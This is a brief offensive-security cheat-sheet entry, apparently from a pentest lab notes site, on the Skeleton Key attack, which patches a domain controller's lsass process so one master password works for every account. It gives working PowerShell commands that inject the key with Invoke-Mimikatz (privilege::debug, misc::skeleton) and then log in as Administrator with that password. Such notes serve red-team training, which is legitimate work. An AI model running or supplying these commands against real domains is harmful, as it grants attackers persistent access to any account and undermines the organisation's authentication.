# Skeleton Key

## Skeleton Key

Skeleton Key is an attack where it is possible to patch DC (lsass process) so that it allows access as any user with a single password. 

It is not opsec safe at all. Skeleton Key is known to cause issues with ADCS.

{% code overflow="wrap" %}

```powershell
# Use the below command to inject a skeleton key (password would be mimikatz) on a Domain Controller of choice. DA privileges required
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

# Now, it is possible to access any machine with a valid username and password as "mimikatz"
Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator
```

{% endcode %}